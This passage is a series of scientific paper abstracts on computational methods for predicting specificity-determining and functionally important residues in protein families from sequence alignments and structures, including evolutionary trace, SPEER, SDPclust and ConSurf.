sets of sequences. --- paper_title: An evolutionary trace method defines binding surfaces common to protein families paper_content: X-ray or NMR structures of proteins are often derived without their ligands, and even when the structure of a full complex is available, the area of contact that is functionally and energetically significant may be a specialized subset of the geometric interface deduced from the spatial proximity between ligands. Thus, even after a structure is solved, it remains a major theoretical and experimental goal to localize protein functional interfaces and understand the role of their constituent residues. The evolutionary trace method is a systematic, transparent and novel predictive technique that identifies active sites and functional interfaces in proteins with known structure. It is based on the extraction of functionally important residues from sequence conservation patterns in homologous proteins, and on their mapping onto the protein surface to generate clusters identifying functional interfaces. The SH2 and SH3 modular signaling domains and the DNA binding domain of the nuclear hormone receptors provide tests for the accuracy and validity of our method. In each case, the evolutionary trace delineates the functional epitope and identifies residues critical to binding specificity. Based on mutational evolutionary analysis and on the structural homology of protein families, this simple and versatile approach should help focus site-directed mutagenesis studies of structure-function relationships in macromolecules, as well as studies of specificity in molecular recognition. More generally, it provides an evolutionary perspective for judging the functional or structural role of each residue in protein structure. --- paper_title: RB: Analysis and prediction of functional sub-types from protein sequence alignments paper_content: The increasing number and diversity of protein sequence families requires new methods to define and predict details regarding function. Here, we present a method for analysis and prediction of functional sub-types from multiple protein sequence alignments. Given an alignment and set of proteins grouped into sub-types according to some definition of function, such as enzymatic specificity, the method identifies positions that are indicative of functional differences by comparison of sub-type specific sequence profiles, and analysis of positional entropy in the alignment. Alignment positions with significantly high positional relative entropy correlate with those known to be involved in defining sub-types for nucleotidyl cyclases, protein kinases, lactate/malate dehydrogenases and trypsin-like serine proteases. We highlight new positions for these proteins that suggest additional experiments to elucidate the basis of specificity. The method is also able to predict sub-type for unclassified sequences. We assess several variations on a prediction method, and compare them to simple sequence comparisons. For assessment, we remove close homologues to the sequence for which a prediction is to be made (by a sequence identity above a threshold). This simulates situations where a protein is known to belong to a protein family, but is not a close relative of another protein of known sub-type. Considering the four families above, and a sequence identity threshold of 30 %, our best method gives an accuracy of 96 % compared to 80 % obtained for sequence similarity and 74 % for BLAST. We describe the derivation of a set of sub-type groupings derived from an automated parsing of alignments from PFAM and the SWISSPROT database, and use this to perform a large-scale assessment. The best method gives an average accuracy of 94 % compared to 68 % for sequence similarity and 79 % for BLAST. We discuss implications for experimental design, genome annotation and the prediction of protein function and protein intra-residue distances. --- paper_title: Automatic methods for predicting functionally important residues paper_content: Sequence analysis is often the first guide for the prediction of residues in a protein family that may have functional significance. A few methods have been proposed which use the division of protein families into subfamilies in the search for those positions that could have some functional significance for the whole family, but at the same time which exhibit the specificity of each subfamily (“Tree-determinant residues”). However, there are still many unsolved questions like the best division of a protein family into subfamilies, or the accurate detection of sequence variation patterns characteristic of different subfamilies. Here we present a systematic study in a significant number of protein families, testing the statistical meaning of the Tree-determinant residues predicted by three different methods that represent the range of available approaches. The first method takes as a starting point a phylogenetic representation of a protein family and, following the principle of Relative Entropy from Information Theory, automatically searches for the optimal division of the family into subfamilies. The second method looks for positions whose mutational behavior is reminiscent of the mutational behavior of the full-length proteins, by directly comparing the corresponding distance matrices. The third method is an automation of the analysis of distribution of sequences and amino acid positions in the corresponding multidimensional spaces using a vector-based principal component analysis. These three methods have been tested on two non-redundant lists of protein families: one composed by proteins that bind a variety of ligand groups, and the other composed by proteins with annotated functionally relevant sites. In most cases, the residues predicted by the three methods show a clear tendency to be close to bound ligands of biological relevance and to those amino acids described as participants in key aspects of protein function. These three automatic methods provide a wide range of possibilities for biologists to analyze their families of interest, in a similar way to the one presented here for the family of proteins related with ras-p21. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Protein sequence alignments: a strategy for the hierarchical analysis of residue conservation paper_content: An algorithm is described for the systematic characterization of the physico-chemical properties seen at each position in a multiple protein sequence alignment. The new algorithm allows questions important in the design of mutagenesis experiments to be quickly answered since positions in the alignment that show unusual or interesting residue substitution patterns may be rapidly identified. The strategy is based on a flexible set-based description of amino acid properties, which is used to define the conservation between any group of amino acids. Sequences in the alignment are gathered into subgroups on the basis of sequence similarity, functional, evolutionary or other criteria. All pairs of subgroups are then compared to highlight positions that confer the unique features of each subgroup. The algorithm is encoded in the computer program AMAS (Analysis of Multiply Aligned Sequences) which provides a textual summary of the analysis and an annotated (boxed, shaded and/or coloured) multiple sequence alignment. The algorithm is illustrated by application to an alignment of 67 SH2 domains where patterns of conserved hydrophobic residues that constitute the protein core are highlighted. The analysis of charge conservation across annexin domains identifies the locations at which conserved charges change sign. The algorithm simplifies the analysis of multiple sequence data by condensing the mass of information present, and thus allows the rapid identification of substitutions of structural and functional importance. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: [29] Identification of functional residues and secondary structure from protein multiple sequence alignment paper_content: Publisher Summary This chapter describes a strategy for the hierarchical analysis of residue conservation and the identification of functional residues and secondary structure from protein multiple sequence alignment. Hierarchical methods of alignment cope with large numbers of sequences and give reasonably accurate alignments. Having generated the alignment, the problem is to find out what it can tell us about the protein family. Interpretation of alignments can be, particularly difficult when there are large numbers of sequences to examine. The method allows the residue-specific similarities and differences in physicochemical properties among groups of sequences to be identified quickly. The method also highlights conserved positions across a complete alignment and, thus, can help to identify patterns characteristic of regular secondary structures. The chapter also discusses a procedure for applying these patterns in secondary structure prediction and evaluates their predictive power in six blind secondary-structure predictions. --- paper_title: Evolutionary trace report_maker: a new type of service for comparative analysis of proteins paper_content: Summary: Evolutionary trace report_maker offers a new type of service for researchers investigating the function of novel proteins. It pools, from different sources, information about protein sequence, structure and elementary annotation, and to that background superimposes inference about the evolutionary behavior of individual residues, using real-valued evolutionary trace method. As its only input it takes a Protein Data Bank identifier or UniProt accession number, and returns a human-readable document in PDF format, supplemented by the original data needed to reproduce the results quoted in the report. ::: ::: Availability: Evolutionary trace reports are freely available for academic users at http://mammoth.bcm.tmc.edu/report-maker ::: ::: Contact: {imihalek,ires,lichtarge}@bcm.tmc.edu --- paper_title: Evolutionary Trace Annotation Server: automated enzyme function prediction in protein structures using 3D templates paper_content: Summary:The Evolutionary Trace Annotation (ETA) Server predicts enzymatic activity. ETA starts with a structure of unknown function, such as those from structural genomics, and with no prior knowledge of its mechanism uses the phylogenetic Evolutionary Trace (ET) method to extract key functional residues and propose a function-associated 3D motif, called a 3D template. ETA then searches previously annotated structures for geometric template matches that suggest molecular and thus functional mimicry. In order to maximize the predictive value of these matches, ETA next applies distinctive specificity filters—evolutionary similarity, function plurality and match reciprocity. In large scale controls on enzymes, prediction coverage is 43% but the positive predictive value rises to 92%, thus minimizing false annotations. Users may modify any search parameter, including the template. ETA thus expands the ET suite for protein structure annotation, and can contribute to the annotation efforts of metaservers. ::: ::: Availability:The ETA Server is a web application available at http://mammoth.bcm.tmc.edu/eta/. ::: ::: Contact: [email protected] --- paper_title: Identification of subfamily-specific sites based on active sites modeling and clustering paper_content: Motivation: Current computational approaches to function prediction are mostly based on protein sequence classification and transfer of annotation from known proteins to their closest homologous sequences relying on the orthology concept of function conservation. This approach suffers a major weakness: annotation reliability depends on global sequence similarity to known proteins and is poorly efficient for enzyme superfamilies that catalyze different reactions. Structural biology offers a different strategy to overcome the problem of annotation by adding information about protein 3D structures. This information can be used to identify amino acids located in active sites, focusing on detection of functional polymorphisms residues in an enzyme superfamily. Structural genomics programs are providing more and more novel protein structures at a high-throughput rate. However, there is still a huge gap between the number of sequences and available structures. Computational methods, such as homology modeling provides reliable approaches to bridge this gap and could be a new precise tool to annotate protein functions. ::: ::: Results: Here, we present Active Sites Modeling and Clustering (ASMC) method, a novel unsupervised method to classify sequences using structural information of protein pockets. ASMC combines homology modeling of family members, structural alignment of modeled active sites and a subsequent hierarchical conceptual classification. Comparison of profiles obtained from computed clusters allows the identification of residues correlated to subfamily function divergence, called specificity determining positions. ASMC method has been validated on a benchmark of 42 Pfam families for which previous resolved holo-structures were available. ASMC was also applied to several families containing known protein structures and comprehensive functional annotations. We will discuss how ASMC improves annotation and understanding of protein families functions by giving some specific illustrative examples on nucleotidyl cyclases, protein kinases and serine proteases. ::: ::: Availability: http://www.genoscope.fr/ASMC/. ::: ::: Contact:[email protected]; [email protected]; [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: In silico discovery of enzyme-substrate specificity-determining residue clusters. paper_content: The binding between an enzyme and its substrate is highly specific, despite the fact that many different enzymes show significant sequence and structure similarity. There must be, then, substrate specificity-determining residues that enable different enzymes to recognize their unique substrates. We reason that a coordinated, not independent, action of both conserved and non-conserved residues determine enzymatic activity and specificity. Here, we present a surface patch ranking (SPR) method for in silico discovery of substrate specificity-determining residue clusters by exploring both sequence conservation and correlated mutations. As case studies we apply SPR to several highly homologous enzymatic protein pairs, such as guanylyl versus adenylyl cyclases, lactate versus malate dehydrogenases, and trypsin versus chymotrypsin. Without using experimental data, we predict several single and multi-residue clusters that are consistent with previous mutagenesis experimental results. Most single-residue clusters are directly involved in enzyme–substrate interactions, whereas multi-residue clusters are vital for domain–domain and regulator–enzyme interactions, indicating their complementary role in specificity determination. These results demonstrate that SPR may help the selection of target residues for mutagenesis experiments and, thus, focus rational drug design, protein engineering, and functional annotation to the relevant regions of a protein. --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Protein interactions and ligand binding: From protein subfamilies to functional specificity paper_content: The divergence accumulated during the evolution of protein families translates into their internal organization as subfamilies, and it is directly reflected in the characteristic patterns of differentially conserved residues. These specifically conserved positions in protein subfamilies are known as "specificity determining positions" (SDPs). Previous studies have limited their analysis to the study of the relationship between these positions and ligand-binding specificity, demonstrating significant yet limited predictive capacity. We have systematically extended this observation to include the role of differential protein interactions in the segregation of protein subfamilies and explored in detail the structural distribution of SDPs at protein interfaces. Our results show the extensive influence of protein interactions in the evolution of protein families and the widespread association of SDPs with protein interfaces. The combined analysis of SDPs in interfaces and ligand-binding sites provides a more complete picture of the organization of protein families, constituting the necessary framework for a large scale analysis of the evolution of protein function. --- paper_title: Large-Scale Prediction of Function Shift in Protein Families with a Focus on Enzymatic Function paper_content: Protein function shift can be predicted from sequence comparisons, either using positive selection signals or evolutionary rate estimation. None of the methods have been validated on large datasets, however. Here we investigate existing and novel methods for protein function shift prediction, and benchmark the accuracy against a large dataset of proteins with known enzymatic functions. Function change was predicted between subfamilies by identifying two kinds of sites in a multiple sequence alignment: Conservation-Shifting Sites (CSS), which are conserved in two subfamilies using two different amino acid types, and Rate-Shifting Sites (RSS), which have different evolutionary rates in two subfamilies. CSS were predicted by a new entropy-based method, and RSS using the Rate-Shift program. In principle, the more CSS and RSS between two subfamilies, the more likely a function shift between them. A test dataset was built by extracting subfamilies from Pfam with different EC numbers that belong to the same domain family. Subfamilies were generated automatically using a phylogenetic tree-based program, BETE. The dataset comprised 997 subfamily pairs with four or more members per subfamily. We observed a significant increase in CSS and RSS for subfamily comparisons with different EC numbers compared to cases with same EC numbers. The discrimination was better using RSS than CSS, and was more pronounced for larger families. Combining RSS and CSS by discriminant analysis improved classification accuracy to 71%. The method was applied to the Pfam database and the results are available at http://FunShift.cgb.ki.se. A closer examination of some superfamily comparisons showed that single EC numbers sometimes embody distinct functional classes. Hence, the measured accuracy of function shift is underestimated. --- paper_title: Prediction of enzyme function based on 3D templates of evolutionarily important amino acids paper_content: Background ::: Structural genomics projects such as the Protein Structure Initiative (PSI) yield many new structures, but often these have no known molecular functions. One approach to recover this information is to use 3D templates – structure-function motifs that consist of a few functionally critical amino acids and may suggest functional similarity when geometrically matched to other structures. Since experimentally determined functional sites are not common enough to define 3D templates on a large scale, this work tests a computational strategy to select relevant residues for 3D templates. --- paper_title: Using evolutionary information to find specificity-determining and co-evolving residues. paper_content: Intricate networks of protein interactions rely on the ability of a protein to recognize its targets: other proteins, ligands, and sites on DNA and RNA. To recognize other molecules, it was suggested that a protein uses a small set of specificity-determining residues (SDRs). How can one find these residues in proteins and distinguish them from other functionally important amino acids? A number of bioinformatics methods to predict SDRs have been developed in recent years. These methods use genomic information and multiple sequence alignments to identify positions exhibiting a specific pattern of conservation and variability. The challenge is to delineate the evolutionary pattern of SDRs from that of the active site residues and the residues responsible for formation of the protein's structure. The phylogenetic history of a protein family makes such analysis particularly hard. Here we present two methods for finding the SDRs and the co-evolving residues (CERs) in proteins. We use a Monte Carlo approach for statistical inference, allowing us to reveal specific evolutionary patterns of SDRs and CERs. We apply these methods to study specific recognition in the bacterial two-component system and in the class Ia aminoacyl-tRNA synthetases. Our results agree well with structural information and the experimental analyses of these systems. Our results point at the complex and distinct patterns characteristic of the evolution of specificity in these systems. --- paper_title: An automated stochastic approach to the identification of the protein specificity determinants and functional subfamilies paper_content: BackgroundRecent progress in sequencing and 3 D structure determination techniques stimulated development of approaches aimed at more precise annotation of proteins, that is, prediction of exact specificity to a ligand or, more broadly, to a binding partner of any kind.ResultsWe present a method, SDPclust, for identification of protein functional subfamilies coupled with prediction of specificity-determining positions (SDPs). SDPclust predicts specificity in a phylogeny-independent stochastic manner, which allows for the correct identification of the specificity for proteins that are separated on a phylogenetic tree, but still bind the same ligand. SDPclust is implemented as a Web-server http://bioinf.fbb.msu.ru/SDPfoxWeb/ and a stand-alone Java application available from the website.ConclusionsSDPclust performs a simultaneous identification of specificity determinants and specificity groups in a statistically robust and phylogeny-independent manner. --- paper_title: Bayesian search of functionally divergent protein subgroups and their function specific residues paper_content: Motivation: The rapid increase in the amount of protein sequence data has created a need for an automated identification of evolutionarily related subgroups from large datasets. The existing methods typically require a priori specification of the number of putative groups, which defines the resolution of the classification solution. ::: ::: Results: We introduce a Bayesian model-based approach to simultaneous identification of evolutionary groups and conserved parts of the protein sequences. The model-based approach provides an intuitive and efficient way of determining the number of groups from the sequence data, in contrast to the ad hoc methods often exploited for similar purposes. Our model recognizes the areas in the sequences that are relevant for the clustering and regards other areas as noise. We have implemented the method using a fast stochastic optimization algorithm which yields a clustering associated with the estimated maximum posterior probability. The method has been shown to have high specificity and sensitivity in simulated and real clustering tasks. With real datasets the method also highlights the residues close to the active site. ::: ::: Availability: Software 'kPax' is available at http://www.rni.helsinki.fi/jic/softa.html ::: ::: Contact: [email protected] ::: ::: Supplementary information: http://www.rni.helsinki.fi/~jic/softa.html --- paper_title: Predicting specificity-determining residues in two large eukaryotic transcription factor families paper_content: Certain amino acid residues in a protein, when mutated, change the protein’s function. We present an improved method of finding these specificitydetermining positions that uses all the protein sequence data available for a family of homologous proteins. We study in detail two families of eukaryotic transcription factors, basic leucine zippers and nuclear receptors, because of the large amount of sequences and experimental data available. These protein families also have a clear definition of functional specificity: DNA-binding specificity. We compare our results to three other methods, including the evolutionary trace algorithm and a method that depends on orthology relationships. All of the predictions are compared to the available mutational and crystallographic data. We find that our method provides superior predictions of the known specificitydetermining residues and also predicts residue positions within these families that deserve further study for their roles in functional specificity. --- paper_title: Automatic methods for predicting functionally important residues paper_content: Sequence analysis is often the first guide for the prediction of residues in a protein family that may have functional significance. A few methods have been proposed which use the division of protein families into subfamilies in the search for those positions that could have some functional significance for the whole family, but at the same time which exhibit the specificity of each subfamily (“Tree-determinant residues”). However, there are still many unsolved questions like the best division of a protein family into subfamilies, or the accurate detection of sequence variation patterns characteristic of different subfamilies. Here we present a systematic study in a significant number of protein families, testing the statistical meaning of the Tree-determinant residues predicted by three different methods that represent the range of available approaches. The first method takes as a starting point a phylogenetic representation of a protein family and, following the principle of Relative Entropy from Information Theory, automatically searches for the optimal division of the family into subfamilies. The second method looks for positions whose mutational behavior is reminiscent of the mutational behavior of the full-length proteins, by directly comparing the corresponding distance matrices. The third method is an automation of the analysis of distribution of sequences and amino acid positions in the corresponding multidimensional spaces using a vector-based principal component analysis. These three methods have been tested on two non-redundant lists of protein families: one composed by proteins that bind a variety of ligand groups, and the other composed by proteins with annotated functionally relevant sites. In most cases, the residues predicted by the three methods show a clear tendency to be close to bound ligands of biological relevance and to those amino acids described as participants in key aspects of protein function. These three automatic methods provide a wide range of possibilities for biologists to analyze their families of interest, in a similar way to the one presented here for the family of proteins related with ras-p21. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Supervised multivariate analysis of sequence groups to identify specificity determining residues paper_content: BackgroundProteins that evolve from a common ancestor can change functionality over time, and it is important to be able identify residues that cause this change. In this paper we show how a supervised multivariate statistical method, Between Group Analysis (BGA), can be used to identify these residues from families of proteins with different substrate specifities using multiple sequence alignments.ResultsWe demonstrate the usefulness of this method on three different test cases. Two of these test cases, the Lactate/Malate dehydrogenase family and Nucleotidyl Cyclases, consist of two functional groups. The other family, Serine Proteases consists of three groups. BGA was used to analyse and visualise these three families using two different encoding schemes for the amino acids.ConclusionThis overall combination of methods in this paper is powerful and flexible while being computationally very fast and simple. BGA is especially useful because it can be used to analyse any number of functional classes. In the examples we used in this paper, we have only used 2 or 3 classes for demonstration purposes but any number can be used and visualised. --- paper_title: OrthoMCL: identification of ortholog groups for eukaryotic genomes. paper_content: The identification of orthologous groups is useful for genome annotation, studies on gene/protein evolution, comparative genomics, and the identification of taxonomically restricted sequences. Methods successfully exploited for prokaryotic genome analysis have proved difficult to apply to eukaryotes, however, as larger genomes may contain multiple paralogous genes, and sequence information is often incomplete. OrthoMCL provides a scalable method for constructing orthologous groups across multiple eukaryotic taxa, using a Markov Cluster algorithm to group (putative) orthologs and paralogs. This method performs similarly to the INPARANOID algorithm when applied to two genomes, but can be extended to cluster orthologs from multiple species. OrthoMCL clusters are coherent with groups identified by EGO, but improved recognition of "recent" paralogs permits overlapping EGO groups representing the same gene to be merged. Comparison with previously assigned EC annotations suggests a high degree of reliability, implying utility for automated eukaryotic genome annotation. OrthoMCL has been applied to the proteome data set from seven publicly available genomes (human, fly, worm, yeast, Arabidopsis, the malaria parasite Plasmodium falciparum, and Escherichia coli). A Web interface allows queries based on individual genes or user-defined phylogenetic patterns (http://www.cbil.upenn.edu/gene-family). Analysis of clusters incorporating P. falciparum genes identifies numerous enzymes that were incompletely annotated in first-pass annotation of the parasite genome. --- paper_title: ConSurf: an algorithmic tool for the identification of functional regions in proteins by surface mapping of phylogenetic information paper_content: Abstract Experimental approaches for the identification of functionally important regions on the surface of a protein involve mutagenesis, in which exposed residues are replaced one after another while the change in binding to other proteins or changes in activity are recorded. However, practical considerations limit the use of these methods to small-scale studies, precluding a full mapping of all the functionally important residues on the surface of a protein. We present here an alternative approach involving the use of evolutionary data in the form of multiple-sequence alignment for a protein family to identify hot spots and surface patches that are likely to be in contact with other proteins, domains, peptides, DNA, RNA or ligands. The underlying assumption in this approach is that key residues that are important for binding should be conserved throughout evolution, just like residues that are crucial for maintaining the protein fold, i.e. buried residues. A main limitation in the implementation of this approach is that the sequence space of a protein family may be unevenly sampled, e.g. mammals may be overly represented. Thus, a seemingly conserved position in the alignment may reflect a taxonomically uneven sampling, rather than being indicative of structural or functional importance. To avoid this problem, we present here a novel methodology based on evolutionary relations among proteins as revealed by inferred phylogenetic trees, and demonstrate its capabilities for mapping binding sites in SH2 and PTB signaling domains. A computer program that implements these ideas is available freely at: http://ashtoret.tau.ac.il/∼rony --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: RIO: Analyzing proteomes by automated phylogenomics using resampled inference of orthologs paper_content: BACKGROUND ::: When analyzing protein sequences using sequence similarity searches, orthologous sequences (that diverged by speciation) are more reliable predictors of a new protein's function than paralogous sequences (that diverged by gene duplication). The utility of phylogenetic information in high-throughput genome annotation ("phylogenomics") is widely recognized, but existing approaches are either manual or not explicitly based on phylogenetic trees. ::: ::: ::: RESULTS ::: Here we present RIO (Resampled Inference of Orthologs), a procedure for automated phylogenomics using explicit phylogenetic inference. RIO analyses are performed over bootstrap resampled phylogenetic trees to estimate the reliability of orthology assignments. We also introduce supplementary concepts that are helpful for functional inference. RIO has been implemented as Perl pipeline connecting several C and Java programs. It is available at http://www.genetics.wustl.edu/eddy/forester/. A web server is at http://www.rio.wustl.edu/. RIO was tested on the Arabidopsis thaliana and Caenorhabditis elegans proteomes. ::: ::: ::: CONCLUSION ::: The RIO procedure is particularly useful for the automated detection of first representatives of novel protein subfamilies. We also describe how some orthologies can be misleading for functional inference. --- paper_title: Automated Protein Subfamily Identification and Classification paper_content: Function prediction by homology is widely used to provide preliminary functional annotations for genes for which experimental evidence of function is unavailable or limited. This approach has been shown to be prone to systematic error, including percolation of annotation errors through sequence databases. Phylogenomic analysis avoids these errors in function prediction but has been difficult to automate for high-throughput application. To address this limitation, we present a computationally efficient pipeline for phylogenomic classification of proteins. This pipeline uses the SCI-PHY (Subfamily Classification in Phylogenomics) algorithm for automatic subfamily identification, followed by subfamily hidden Markov model (HMM) construction. A simple and computationally efficient scoring scheme using family and subfamily HMMs enables classification of novel sequences to protein families and subfamilies. Sequences representing entirely novel subfamilies are differentiated from those that can be classified to subfamilies in the input training set using logistic regression. Subfamily HMM parameters are estimated using an information-sharing protocol, enabling subfamilies containing even a single sequence to benefit from conservation patterns defining the family as a whole or in related subfamilies. SCI-PHY subfamilies correspond closely to functional subtypes defined by experts and to conserved clades found by phylogenetic analysis. Extensive comparisons of subfamily and family HMM performances show that subfamily HMMs dramatically improve the separation between homologous and non-homologous proteins in sequence database searches. Subfamily HMMs also provide extremely high specificity of classification and can be used to predict entirely novel subtypes. The SCI-PHY Web server at http://phylogenomics.berkeley.edu/SCI-PHY/ allows users to upload a multiple sequence alignment for subfamily identification and subfamily HMM construction. Biologists wishing to provide their own subfamily definitions can do so. Source code is available on the Web page. The Berkeley Phylogenomics Group PhyloFacts resource contains pre-calculated subfamily predictions and subfamily HMMs for more than 40,000 protein families and domains at http://phylogenomics.berkeley.edu/phylofacts/. --- paper_title: Clustering of proximal sequence space for the identification of protein families paper_content: Motivation: The study of sequence space, and the deciphering of the structure of protein families and subfamilies, has up to now been required for work in comparative genomics and for the prediction of protein function. With the emergence of structural proteomics projects, it is becoming increasingly important to be able to select protein targets for structural studies that will appropriately cover the space of protein sequences, functions and genomic distribution. These problems are the motivation for the development of methods for clustering protein sequences and building families of potentially orthologous sequences, such as those proposed here. Results: First we developed a clustering strategy (Ncut algorithm) capable of forming groups of related sequences by assessing their pairwise relationships. The results presented for the ras super-family of proteins are similar to those produced by other clustering methods, but without the need for clustering the full sequence space. The Ncut clusters are then used as the input to a process of reconstruction of groups with equilibrated genomic composition formed by closely-related sequences. The results of applying this technique to the data set used in the construction of the COG database are very similar to those derived by the human experts responsible for this database. Availability: The analysis of different systems, including the COG equivalent 21 genomes are available at http: //www.pdg.cnb.uam.es/GenoClustering.html Contact: [email protected] --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Automated structure-based prediction of functional sites in proteins: applications to assessing the validity of inheriting protein function from homology in genome annotation and to protein docking. paper_content: A major problem in genome annotation is whether it is valid to transfer the function from a characterised protein to a homologue of unknown activity. Here, we show that one can employ a strategy that uses a structure-based prediction of protein functional sites to assess the reliability of functional inheritance. We have automated and benchmarked a method based on the evolutionary trace approach. Using a multiple sequence alignment, we identified invariant polar residues, which were then mapped onto the protein structure. Spatial clusters of these invariant residues formed the predicted functional site. For 68 of 86 proteins examined, the method yielded information about the observed functional site. This algorithm for functional site prediction was then used to assess the validity of transferring the function between homologues. This procedure was tested on 18 pairs of homologous proteins with unrelated function and 70 pairs of proteins with related function, and was shown to be 94 % accurate. This automated method could be linked to schemes for genome annotation. Finally, we examined the use of functional site prediction in protein-protein and protein-DNA docking. The use of predicted functional sites was shown to filter putative docked complexes with a discrimination similar to that obtained by manually including biological information about active sites or DNA-binding residues. --- paper_title: Secator: A Program for Inferring Protein Subfamilies from Phylogenetic Trees paper_content: With the huge increase of protein data, an important problem is to estimate, within a large protein family, the number of sensible subsets for subsequent in-depth structural, functional, and evolutionary analyses. To tackle this problem, we developed a new program, Secator, which implements the principle of an ascending hierarchical method using a distance matrix based on a multiple alignment of protein sequences. Dissimilarity values assigned to the nodes of a deduced phylogenetic tree are partitioned by a new stopping rule introduced to automatically determine the significant dissimilarity values. The quality of the clusters obtained by Secator is verified by a separate Jackknife study. The method is demonstrated on 24 large protein families covering a wide spectrum of structural and sequence conservation and its usefulness and accuracy with real biological data is illustrated on two well-studied protein families (the Sm proteins and the nuclear receptors). --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying 